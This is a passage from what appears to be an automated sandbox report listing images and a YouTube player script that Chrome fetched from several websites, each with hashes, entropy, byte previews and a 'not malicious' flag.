                                              Preview:RIFFP=..WEBPVP8 D=..P*...*....>Q(.F#..##.....gn.._......o2...n..........O....c.?z.Bt25..k..7._......k./~W.......;j..tw.E..5...+..oA~c.K.z.................U.......?..D...^....C.....W.7...g....d.T/....=.|...~..\.[.....Y..Y{.?...}..o.~i......?......#./.~3....._Q.....'..k.....I.O...?.?........../................>.[7._.............._..{................#.O...>...........e.........W...W..........i..._..........9..M...(.wB......{....`KS....C..Rc...%..#......NR!..e.-.e &.3..z...........MjR............NH.oU_....ro......i\.E../.....J......<.u.....X.h./.<.|h/[.J....D.T8C./.x..}...Y.G..m.pl.W"...S..<.........:z.iW.a.....%(aJ./.x..^P.E...]tk.....hj.7j.J.Q|..[..#.:z./.r/.x.....c..Mu....{........W.i\..........f..a..8.....<.>.~..0oR6{.m.e3+..u.r/.i&.0...........E..[|z............c^..V.9..R...K.?.i\.D.5.F.....K.....M....5...d.A.m{.(...A.~.....n.E........X5..u.B9.....+...".a.%..E.7.. ....5.F...[N..CXaFh..s....RW.</iC./...._.J._."..... ..!..3.U..5.GQ..k..u.....
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 155 x 80, 8-bit/color RGBA, non-interlaced
                                              Category:downloaded
                                              Size (bytes):21796
                                              Entropy (8bit):7.9762495517669265
                                              Encrypted:false
                                              SSDEEP:384:K0wD5FZrr6BSQw+81bnHw9vfpx7189Iz4tfn5fY7TTsIW0ZC1IWAIdgZKCg7:K/FRrke9jHwVfjJ8ez4t5gbsID/DZKz
                                              MD5:94FBD84C3C40E96AC9B7BA04F083A431
                                              SHA1:A51F3CC5451F02B718F72B79F0673E07681AE58F
                                              SHA-256:214499ADDD871CABDE720E2C551843C9D5B675546C2115CE5221AFCF06569323
                                              SHA-512:2D8CD775695AC7D73C882B3E7BBAD0003E157C0BDFA609CDDBD0B5543A21B6C210865BC4C7D0EDCD8BCFC4BFCB91B741702578047F9DB68FC21D92DCC89F4B34
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/imgs/logos/ifpa.png
                                              Preview:.PNG........IHDR.......P......N......gAMA......a....IiCCPsRGB IEC61966-2.1..H..SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m....... ......O.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 1000x800, components 3
                                              Category:downloaded
                                              Size (bytes):145835
                                              Entropy (8bit):7.975888211635867
                                              Encrypted:false
                                              SSDEEP:3072:o2wGVPKPW31v2s7KIE10DnLKCT/R04nd7AoSP03p1yT339:o2XVPV3ws7DO0DWCLLndsi1O339
                                              MD5:3D870480DFF2F571AADDAA4D3CD0930C
                                              SHA1:D2371E68D9DF1D4E7D9A39E53DD7CA81CC4C1BEA
                                              SHA-256:907CCBBA3C06E85A96777D103505482869D57FA39B16B27331AC62F9746B3D1C
                                              SHA-512:BAE786AA5F5436F191A33CC9A020367D8C7CF8DD1A7011BBFDE9E7C9C4521886B154D391B8DD5FCE4EA196617BE7F84B95A68D6CFD41CC41BC907FC60673FE77
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/services/2/0a2cabcf66a453f359c982144e5981b0.jpg
                                              Preview:......Exif..II*.................Ducky............./http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.171c27fab, 2022/08/16-22:35:41 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 24.1 (Windows)" xmpMM:InstanceID="xmp.iid:A20F4146934111ED86EA9DB4A8B2FF29" xmpMM:DocumentID="xmp.did:A20F4147934111ED86EA9DB4A8B2FF29"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:A20F4144934111ED86EA9DB4A8B2FF29" stRef:documentID="xmp.did:A20F4145934111ED86EA9DB4A8B2FF29"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...!Adobe.d..............Ne...{..9...........................................#%'%#.//33//@@@@@@@@@@@@@@@......................&.....&0#.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 70 x 210, 8-bit/color RGBA, non-interlaced
                                              Category:dropped
                                              Size (bytes):4765
                                              Entropy (8bit):7.914349551855348
                                              Encrypted:false
                                              SSDEEP:96:C5raGXbfz6dbVDMp6GRoL2Ycy1EPAqI2I5aO6BLQZfYJq5K5Ic0u5NI3iE:mraAbL6NVD++aAqI2I5LDAJq5eIfuXi/
                                              MD5:9A942045EC3F115DAE872C3BE6B3A047
                                              SHA1:AF88E5C73E9D34C671A7ED099C0628C249DFD9E2
                                              SHA-256:EA80D10D991B201E42309C3FC535F9ABE17F5F37E4128A69E41E05B233DFB223
                                              SHA-512:7F5FA48CEE78FE5C887A8EB9C69076D03D6DD9B2B05E29CA4A0F7C48146064D4F94E9B0301910CBE6929B99121E99C2B309F2EEB564BDAE2F7E29259ABD66CDA
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR...F...............dIDATx...utT.....K.HZ&......"W..n.e....?.........*.8$xm.H.PA..@3..~.........ae....Ygr...og.$}rU4{j..&...v.0....D...-*.........e} j.]...y.:`..\........QF........e$.1:`.-.QF.......T.<G.x.S.T.~.<G.x.S.T.~.<G.x.S...s$......>^1G..K......s$.......^1....Q....'..%..8.v.@a<.......R..;..8#...C[jQc...g$:.vhK-j.0a..p.2P..a<...e....x.3.%.@Qc.......(..h.7(.G...Tc.uC..z.S.]V.j..n.r].q..0.V.:.9..^......SiE..S......SiE..S...4Lk.D...D..~....Z+L....H.ZaB\.=..B..s..%.u.p...0.a...lWL..\jEI.u.p..E...0#.0/.)..+.Ki.3...R.&.....Da.?L4^..wA<..=.E*.S^^~(..D.S..\w0.d .`...a..%...L..@....'....n...0U...$D<..-..Ei.R.-.2}.I.S.|..bH../Z....%!J.|..bV../Z....%!..|..*...-....;.cq...F..9..c......\..p.u.d..........|.8q<.DH.".nwT@.T..WDwT@.T......ys+..|...d..@,E..Fag. ;1...a.v...S.7.....F..]=\..VC{...=.Oza5.Gk.;.}'.K.k..dO..u...v..=9>n.1.#.."){r.~b.k.me....nn.o+.....(....Y....w$.....=......s*t.NKG...".bX..+.uK...B;L....P/....|B-v.X.....8!.......8
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                              Category:downloaded
                                              Size (bytes):3763
                                              Entropy (8bit):7.925684236946954
                                              Encrypted:false
                                              SSDEEP:96:aLDKRk/mx5JnEIGgloxIdq+t1RGMsbz2dal5xfkgFc:ysk2GYoP+xGH2e5VkgFc
                                              MD5:1934EBACE8BAD93CA1219C2AA2ACBC15
                                              SHA1:FDD9D68C865E071C2F8B2430AD93E61F928BBE0C
                                              SHA-256:84B6D3873B3DAB81667A51C5011AFC02E313DF4290279C9222A4CBCD31D163D7
                                              SHA-512:4D2B2BE177D33DBFA2D8AD3C1E2097523827295BCB723371720A1D721F0B4389CA7E35E40D3FBE349E74140EB9AD379B2E48306105A1641842D1AB7C22E340CE
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/images/menu/adwords.png
                                              Preview:.PNG........IHDR...d...d.....G<ef....PLTE!........M.O...............K.N............#.....%................................"..A.D............?.Q...T.R...)..............+..I.XI......z.......#.....I.M+..!~...4..........v...."..<..vU..Y.?...i..=.>..\..i.g..X.......S.]......A.....u.)..../..7..]...'{...em....E.g.......ZIDATh...S........|BBv.\...$..A.Q..:jOu.[.....?...=.....g.q.....-..eI.'....4WU..l....q.I.pLI..J....QD.4I.L.ss$..B4vQD.4M#.....+I...".....x0.%.:..P{S.C.x0[/......`6.e.RY|.....,...}.[.b.u..".^`Y.`L.!....`N..&...&u...D08..8|.......9qT..UV{...!.U.....8\z.].u~.....J.k#.\U...T....m"....k..E.....b.X.q.aL&....Go.z{:C.....U.Dv.x.Y,..d...=%...$1.}.D.T.. .nL.HR.n..~{...e.. T.......?d.....x.10M@\..H.w.Z..0.g.qy..^#.67..C>.Y.I....i.t....R.q:c../..wC2.T......w.i.c...".F..].|ys...... {3..%.B.Z.CS...`T..'(a.;w..}.D..a...EW.' ...{.0...C....U+.r.L(......yiN.D.].*.....l.Y!C(......b.I.o.fA...VN......c5y..:.e.8R.v.j.LZ.Nq4.VY.........-?/'.z~.U.,..(.s!B
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:dropped
                                              Size (bytes):9740
                                              Entropy (8bit):7.972399479101138
                                              Encrypted:false
                                              SSDEEP:192:b0tR67h4liUs2tSEDJYd4B8CV5Qlv5EKXcJilLOGLfAuvoDc3C9:b0tz3lFYvCV4vS+Zl6GLfA9
                                              MD5:DC06CC78FA5800F7738F2C0F0D908096
                                              SHA1:2C09B76DE57E2B258AB44799731DEFF0C7AFAF94
                                              SHA-256:BBA4B75E57D5020DD47AAFFB2DD79690792704D36325A3F62CE441D9B056AF0F
                                              SHA-512:B66199B792BD2B60A85C7F6FF66B92F93DE8252EFA439ADE8E44F461BEC53EF1C38E34B5B1E6AA23692DE07732F818521DD149773D86BE7FBEC3994D6B312145
                                              Malicious:false
                                              Reputation:low
                                              Preview:RIFF.&..WEBPVP8L.%../..?...6.mU..2.N'T@.s.px~.i.m.r..KZ......d....I.U...?..VO.<...3.Ac.EF4 ..+:.@.a..1@.(.S.E..BL..!a.%.....6%!.]H.....z8$.@[>(....5.....;J...J...J..._.{8.u.W....2F.c2..4..odZW...../..@ .o*..Q......H~*.....-.O..*..z...U^..f..K...=..!...Qx..OO.m...@...@.....`..UAq.[o...z.....$3..$.>..D...$.a.CT.....)...<..e.tXO.h;.).n,5....:...C.........B..-.Y...Yh...m.......G.Fk.YVR.h.B.!b?%w5....`7.X..;.Y.rE.Eghs...Y....C<.t_.hn3tS.....l..*..M2.V.C...1.w..............z....6C.nk.>t..;.j..f.4.)6.M......!8i".]...i....#V..Jp.=..Wb].....pf.hr..P..:...W...-;.....tX...R,..Fm=..K....n..I...R."O..7..e(..z.e^Y...(.I....GI%~G+..+..A...:!g.4...R..\..H..{.2......@....qn/....vJ.y...Xx4B..........|...p....@..Nu\..>....T.]....|s..m#..A../|..i.|....k..u.....4Z..u.....-....6....p..m6._.M........B..;.'.$...n{]6.=.K.....y?..5.L...;.....&...Xmw]6.].O,..6.1.{.!.....&.=.pWM...n#........d..l.../."....mc].e^N...Ww..U[.m;.....r|b...Iy.%}...n}.Ve-... ...-
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:dropped
                                              Size (bytes):14070
                                              Entropy (8bit):7.9797662873078075
                                              Encrypted:false
                                              SSDEEP:192:SNXiXOr0Rk3+7GhU7cxSnYsBrM7uN0Rqq2Hom1UB03sfLp7zANxgvg7gSkR:seO4RiwGhU7HbBuuXq2Ho/gUt/eC
                                              MD5:75149400BFD5C2048C4988838CE1E36A
                                              SHA1:9C6FA71C851B43D9101E061026D04629B8DEED74
                                              SHA-256:A3B636DDC81013BBD1DE7D5A74707ADF0CBAE3669A8CA96D3E0095C1E7920B23
                                              SHA-512:60C45C786DA4B5B15F27A901BFA9CE9233ADD020D474110528A3ACFC09BCC04B79B16C57EDD8A703D28DAE9F1AFA9AA1342424C77CB4190949FD92650A716978
                                              Malicious:false
                                              Reputation:low
                                              Preview:RIFF.6..WEBPVP8L.6../..?...6.m..]#.I).... .....=....m..w7\S2.i.^.B,u?..8.mU..~.r `b....;<=...P.b.U(.Q.4....H.%H".B$.B...ch..RTP.B )6.*....2"..I...28..`..{g.O&0....6.2/...5.h!..^....!.OO.f.).W.....?.....g.N.y..U..H.23.G..)...Gz.F.Yyb.......5e....g.L....N.......+/'y^......o....T...Gm..mk..........\......iE/.8ekv..n. c.v.g!......./...%.............~..y..........k..EA...?...W.F...!..1.#O..$...eh..uO#8.3....7.............N,.....b..e.T.._V.vY-I.....u....N?..Q...G.#9,......c5..7D........e..~C..~.o..xKG\.Ym.a.W........P(..m$"...h.|R.F..`L.h.B...:0.&c..~L....5r...7.......G.../5V...q.).8v.O..9|.....3<.?H. k.......F((....3D.j/I.+{.|.j.v...U}......."..J(....G.PO.W.Q...U..O.$..4.>5..+.5..+@.....E...../t......\...S.@.T...9d..O...\...J]..0...f.$..J...{X...}o<.e.w...S.~$*.!....D.K..._..?........'....T%........\..'.F.."....Y...3...X..U.{.......A/...~........7......+.m..{..a^C.x....V..0%}.q."$9J.S.i{..)L=..IbJ.....'.._.......U.<...A...'..U.......W\.....B.x.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with very long lines (1159)
                                              Category:downloaded
                                              Size (bytes):338712
                                              Entropy (8bit):5.61633684161754
                                              Encrypted:false
                                              SSDEEP:3072:o7Ay2hxnVV2GDbjq5ZfFMinfgbYeVjJ4gVp+6I7w7MyE9at9idYEH:okyo/2GHjq5ZfSbHVd42u7w7rEYtUSS
                                              MD5:91680884EED37B5ED4A53094296D6527
                                              SHA1:F3DF67A86E7B4C75F3C47F8E4EEF569CB2CE080F
                                              SHA-256:7B423B08E9EB0B19D9CE4B1E1F40B4EF0C00F40499FFFCE239FCA160BB07CFCF
                                              SHA-512:C3C0149DF32C9E40CF09DD0A37240935F26353A8402C6BCC6EDA3304FDE962A4E3D7B41F40CA3DE929AAF4F8B20F4812D97D2027E274284E84206E80F3BDECCD
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.youtube.com/s/player/b0557ce3/www-embed-player.vflset/www-embed-player.js
                                              Preview:(function(){'use strict';var p;function aa(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}.var ba=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function ca(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}.var da=ca(this);function u(a,b){if(b)a:{var c=da;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ba(c,a,{configurable:!0,writable:!0,value:b})}}.u("Symbol",function(a){function b(f){if(this instanceof b)throw new TypeError("Symbol is not a constructor");return new c(d+(f||"")+"_"+e++,f)}.function c(f,g){this.h=f;ba(this,"description",{configurable:!0,writable:!0,va
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 155 x 80, 8-bit/color RGBA, non-interlaced
                                              Category:downloaded
                                              Size (bytes):10077
                                              Entropy (8bit):7.960846075105278
                                              Encrypted:false
                                              SSDEEP:192:UIIHUCD4wa3SvuqIHv7B7YY4zhYq4tM/ClUkJa50sb9F8a:K0wDvurHvCY4zyG/R6a50Yz
                                              MD5:F796804F132E3B8FB104CD6FBFEDC5A7
                                              SHA1:31339E1F22E670A65A699E58D1C2F24E29F61B4B
                                              SHA-256:857825203EDA4036EA086113A46F51DEADD89846FC157F933C23B7ECA2D918B5
                                              SHA-512:2FB61AAA0694924F781A79393D73E3032B6EF868168395ADC6BBE0FCA569D95C35648DC52BAC66BEF77CD27EC98135118CD60C64CCA9B259F172995A0F20CA0F
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/imgs/logos/atom.png
                                              Preview:.PNG........IHDR.......P......N......gAMA......a....IiCCPsRGB IEC61966-2.1..H..SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m....... ......O.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:downloaded
                                              Size (bytes):18062
                                              Entropy (8bit):7.76016532792245
                                              Encrypted:false
                                              SSDEEP:384:4YNg7fkna4imoOvIVRbLXnqQsg/BKJ9pWKGafLj9SFDDUWMnSbca:4Yy5OvwRHX6/YnmH9KVksT
                                              MD5:D33604A46A1546883155BA9D410D461F
                                              SHA1:897B89114622721AAC896E1AC411DEEC0F06FAB4
                                              SHA-256:BCD36C5F11CC4B23C0A8DD532AE57933FF24C7D082FD880803EC747AE94E874E
                                              SHA-512:2FBD4C2EE15FD437991AEEC09A5E0E806F23CB0FE3B2F5FFBCF6931E86B34D069DCDD427A5F390F3AEE69E51B5A5514646B54BB560ADC94150C688240443BDC1
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/partners/36/30b24f4108a6fbd6b64ca7f37a0b039f.jpg
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with very long lines (1159)
                                              Category:downloaded
                                              Size (bytes):338712
                                              Entropy (8bit):5.61633684161754
                                              Encrypted:false
                                              SSDEEP:3072:o7Ay2hxnVV2GDbjq5ZfFMinfgbYeVjJ4gVp+6I7w7MyE9at9idYEH:okyo/2GHjq5ZfSbHVd42u7w7rEYtUSS
                                              MD5:91680884EED37B5ED4A53094296D6527
                                              SHA1:F3DF67A86E7B4C75F3C47F8E4EEF569CB2CE080F
                                              SHA-256:7B423B08E9EB0B19D9CE4B1E1F40B4EF0C00F40499FFFCE239FCA160BB07CFCF
                                              SHA-512:C3C0149DF32C9E40CF09DD0A37240935F26353A8402C6BCC6EDA3304FDE962A4E3D7B41F40CA3DE929AAF4F8B20F4812D97D2027E274284E84206E80F3BDECCD
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.youtube.com/s/player/26636eff/www-embed-player.vflset/www-embed-player.js
                                              Preview:(function(){'use strict';var p;function aa(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}.var ba=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function ca(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}.var da=ca(this);function u(a,b){if(b)a:{var c=da;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ba(c,a,{configurable:!0,writable:!0,value:b})}}.u("Symbol",function(a){function b(f){if(this instanceof b)throw new TypeError("Symbol is not a constructor");return new c(d+(f||"")+"_"+e++,f)}.function c(f,g){this.h=f;ba(this,"description",{configurable:!0,writable:!0,va
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 150 x 209, 8-bit/color RGBA, non-interlaced
                                              Category:dropped
                                              Size (bytes):7847
                                              Entropy (8bit):7.958894104401708
                                              Encrypted:false
                                              SSDEEP:192:5S0vKpd4vC9gg9py+WuEkxZpgsdS1dp16+U0NdUE1Z:g062aSgMuE+ZpPdS1dSLO2Ev
                                              MD5:B05D49CEB0A9C7A6DF66440D9630EC69
                                              SHA1:24BB59CC9933FD7133BBDA72506EDFDD8D6A37CC
                                              SHA-256:41F4E1352423634B8D717285775537AD988910C882E0A7C4081D8B1A9B4FF27D
                                              SHA-512:D8C206CCABAA4389A95AF2CF1EAEFE5E254F10CB3B7FD315CAA75E70ADBF28BEE6CBCC88D900B2B5BACEE8A04FF54CE95C6CBC8174628E2300D360227C16746C
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR..............\K6....pHYs.................sRGB.........gAMA......a....<IDATx..]...G.~....Y72..v..+.....9.......p.....@....nN@[Zi.....v.6.5...3c..........j.'..*2.23.|?_.../..+`0:.....0...@...`0:.....b........!......2z.,T..`0..T.I..0..B..!...9T..J....B..#(.....+g........*0..cxa..y-.r....Jh................Q.g1:A............\.K..s....:p......V.1..X}L,.8.g....].yL.#.|.`.<.x=.6.2x~.........~.vq.........`0f..WS.&..C..rGT7`...U7H.M.PE.......|..].X..;d..(/.V...../.A.=`0R...?l|=.~.W..CF......../_.......p.....[x-....!..F....S.W..}...-.A..........j.....<.....EAF.....Obp.%.fd.8.bL..Z...1.....X...Z....."..r.n.."$-...".@.._.mR.D,.ZEQ.....\.w76.%...-.....R[....c......y.5HGy~..%~..)...hE,..T..3...Bj..+.`... 6...L.q.K.0..../....L.b..a..>n..-fr../.~..R|.........-..s....{.....)..U..ow`..E,.N.._...O../).J.B#..?...R=...(.%=.fNt.&:...i%.1......T........HH..R....._uV..+t......)....$..w.CtN,..ky.........Z|.E*Bo."0...}...+..L..C.".N,...?..R....d!..g....
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                              Category:downloaded
                                              Size (bytes):3274
                                              Entropy (8bit):7.929862262138715
                                              Encrypted:false
                                              SSDEEP:96:hpxH95oBLFGfJueu6Rrmx/Oj9J5kFdoWBFOI2uaz:7xHzcyHQOz5kboN4az
                                              MD5:6CD1D31E708884FD2A0A827E7C683396
                                              SHA1:33B2DB1F35BF1A3752EF6715733CFC86A080AC58
                                              SHA-256:465E45BE85EEC94F3291D29E85EE3E9DA1B13DF14B9A2B8EB729F0250609B4F3
                                              SHA-512:DED12289E4341117BEB8CB7D4220F993B18D5047E53ECC017C7C4BC336413DEB64F17FF0956125573439D986EF9714B6DBE6C4B5BE0443B647E8C3BA03139F34
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/images/menu/blogger.png
                                              Preview:.PNG........IHDR...d...d.....G<ef...NPLTE....{..{.....s..r..y..x........y..t..U....z..p.....y..5........l....<......&}...7IDATh.Y.v.:..+.,..........r..W......H..U.u.T..?\.L.8.....NK.:~..;....~...\V..j.i...c...yn....v..J)...........E..k...K.U6.A...,...+.ajUV'.`.....S9X..u.h.l....w)..Z7Mz..........Ux._.2.../..A.+.....7.K.x8n.`Cr.J...f..e...\R.e.b,..i...H....v8..].p.....R.A.*../,....yz[.nX....tu.Y`h..mI.o.....{.y...9..K.+..~.4....`r?..i.o_.6.&V................_.+....3x.{.!)...w.v....1.A.X1.H...!..I..~....[.<._......1..c.....c..M.C5.G.#.j.Y...6.....>k.3...{d]lG.......c..2t.*.C....n~..yS..D...[.v..9...h....W~_M.........4....B./..)(.WT!..Q6......8.oZ F.....q..Q..Z.2....hm.:(.u......!$&..g.%)..xs\\Bye:..n..4.O..M.FV.v..W...Ec.~....-@.;.dS....sO......r..G.B%T.x.p..m9.v....4.*;..9}.<G...&w.j..}..%[a./.3z.}.|.......^....#6.&F..d\.o...n......Z.....%|......KJ..XX....3,(..&....e)......nn....FGd..)."u.w...(...s...Mnnn4d.4bB.*.>-w........Xg.e~.2..Z.?
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:dropped
                                              Size (bytes):13786
                                              Entropy (8bit):7.621431631137947
                                              Encrypted:false
                                              SSDEEP:192:4YNMtKwdfjUR6hoapuSNfsJcqlRPvfFLo6z569X8iZpyvq:4YNg71U6tN6lBfm6zS86pyvq
                                              MD5:445BBB116A232AD47817E0D38C2A9EB1
                                              SHA1:7D32F1381838F43FC27404803A8A8D1A33A00D75
                                              SHA-256:1A86CF1CBFBB3046CF529A6E42A6EECB55E9114322A69B6C9B1220A0B75F97BA
                                              SHA-512:15AC5695B38054F5288C3F4EAA833405904E537DDD9F5B17794C8CD2F977B6BBDAA9340C780E8A1F9A2C9483FEC231BC9F5373CFB5001204459988402F422EF3
                                              Malicious:false
                                              Reputation:low
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:SVG Scalable Vector Graphics image
                                              Category:dropped
                                              Size (bytes):8059
                                              Entropy (8bit):5.22083362492118
                                              Encrypted:false
                                              SSDEEP:96:+uAitNAfkdAKF1A9+Tri6lcEAjwTHq6KAhaTtPa62A0jojwJw5uwswwwVdZFdrYT:DBjJTekcyTKzTojvwvC
                                              MD5:D0B79120F3FAC9EB600DF85F52258737
                                              SHA1:B13C28ED9089327880DBCA8BD4EE1920BC88BA89
                                              SHA-256:42ACDD11DF788229E5D8B5ED1F4E02DF21557A703D8745B1A98C40CD2313E50F
                                              SHA-512:EAA67C4C4C5AFC09F27140E13B8469085C9B94B08DCB7FC570CCADFB98D66B1E8AF1380B6248698E78FAFC6A7F50D98A372C5FCEA1603E83102C73E9887DBF98
                                              Malicious:false
                                              Reputation:low
                                              Preview:<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="124.183" height="135.13" viewBox="0 0 124.183 135.13">. <defs>. <filter id="Rectangle_Copy_16" x="0" y="0" width="124.183" height="135.13" filterUnits="userSpaceOnUse">. <feOffset dy="3" input="SourceAlpha"/>. <feGaussianBlur stdDeviation="3" result="blur"/>. <feFlood flood-opacity="0.161"/>. <feComposite operator="in" in2="blur"/>. <feComposite in="SourceGraphic"/>. </filter>. <filter id="Donut_0" x="44.998" y="20.418" width="54.257" height="77.636" filterUnits="userSpaceOnUse">. <feOffset dy="3" input="SourceAlpha"/>. <feGaussianBlur stdDeviation="3" result="blur-2"/>. <feFlood flood-opacity="0.161"/>. <feComposite operator="in" in2="blur-2"/>. <feComposite in="SourceGraphic"/>. </filter>. <filter id="Donut_1" x="21.289" y="46.26" width="44.39" height="50.995" filterUnits="userSpaceOnUse">. <feOffset dy="3" input="SourceAlpha
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
